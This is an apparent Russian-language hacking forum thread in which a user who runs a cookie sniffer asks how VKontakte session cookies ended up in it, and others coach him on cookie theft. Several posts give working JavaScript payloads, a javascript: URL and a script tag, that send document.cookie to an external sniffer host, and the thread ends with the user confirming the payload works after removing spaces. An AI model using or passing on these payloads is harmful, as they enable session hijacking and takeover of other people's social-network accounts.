XSS - контакт
 

Здравствуйте! Помогие пожалуйсто, вот такая ситуация произошла....я юзаю ачатовский сниффер, но ктото недавно видимо заюзал мой снифф....Но дело не в этом, я вот увидел , что в моем сниффе появились куки от контакта!!! тоесть там было :

Запрос с vkontakte.ru (**.**.****)
QUERY: remixlang=0; __utmz=2010492......ну как пложено в общем
Но проблема в том что в Reffer не показано нечего = (
в реффере вот это :
REFERER: http://vkontakte.ru/id11597***?25*3*

Скажите , что это значит? Вконтакте есть активка о_О ???? Или как можно вапще пощупать эту багу? я заходил на страницу...обычный какойто юзер , нече у него на странице интресного ( скриптов) неувидел(

если не ошибаюсь можно зайти вконтакт и потом стереть урл и прописать cниф

ага и нечего непроизойдет ( ток что попробовал)

плохо пробовал

javascript:var%20s=document.createElement('script' );s.src='http://**.ru/snifer/s.gif?nc='+document.cookie;document.body.appendChi ld(s);void(0);

Как-то так :)

В таком случае обьясни плз новичку , что ты имел ввиду, тоесть я зашел вконтакт, стер укр , вписал туда :
<script>img = new Image();img.src = "http://antichat.org/s/*******.gif?"+document.cookie;</script>

Если просто сниф вставить без КСС то будет ПУСТОЙ реффер !!! а кук небудет!

Где ошибка?

Это тебе не сайт а браузер так не прокатит. :)

Я понял уже...тока чето
javascript:var%20s=document.createElement('script' );s.src='http://**.ru/snifer/s.gif?nc='+document.cookie;document.body.appendChi ld(s);void(0);
непомогает, "0" !

ПРОБЕЛЫ УБЕРИ

Пипеец я ламо...=// Спс биг S0ulVortex ! Все пашет , кулл, терь я понимаю это дело , спс = )